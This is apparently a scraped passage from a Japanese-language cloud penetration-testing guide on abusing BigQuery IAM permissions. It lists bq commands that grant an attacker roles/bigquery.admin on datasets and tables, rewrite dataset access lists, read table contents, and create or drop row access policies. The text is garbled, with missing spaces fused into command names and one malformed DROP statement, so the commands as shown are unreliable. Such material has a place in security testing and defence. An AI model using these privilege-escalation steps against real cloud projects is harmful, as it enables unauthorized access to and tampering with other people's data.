# For this you also need bigquery.tables.getIamPolicybqadd-iam-policy-binding \--member='user:<email>' \--role='roles/bigquery.admin' \<proj>:<dataset># use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
# Download current permissions, reqires bigquery.datasets.getbqshow--format=prettyjson<proj>:<dataset>>acl.json## Give permissions to the desired userbqupdate--sourceacl.json<proj>:<dataset>## Read it withbqhead $PROJECT_ID:<dataset>.<table>
bigquery.tables.setIamPolicy
攻撃者はこの権限を悪用して、BigQueryテーブルに対してさらなる権限を与えることができます:
# For this you also need bigquery.tables.setIamPolicybqadd-iam-policy-binding \--member='user:<email>' \--role='roles/bigquery.admin' \<proj>:<dataset>.<table># use the set-iam-policy if you don't have bigquery.tables.setIamPolicy
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used
# Remove onebqquery--nouse_legacy_sql'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'# Remove all (if it's the last row policy you need to use thisbqquery--nouse_legacy_sql'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'